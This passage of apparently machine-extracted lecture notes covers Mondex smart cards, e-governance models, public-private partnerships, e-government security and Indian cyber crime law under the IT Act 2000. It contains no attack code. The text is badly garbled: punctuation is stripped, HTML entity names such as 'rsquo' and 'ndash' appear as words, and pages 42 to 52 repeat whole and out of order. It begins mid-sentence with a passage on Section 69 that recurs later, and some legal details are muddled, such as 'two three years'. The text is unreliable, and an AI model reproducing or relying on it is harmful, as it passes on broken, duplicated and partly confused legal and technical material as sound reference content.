integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
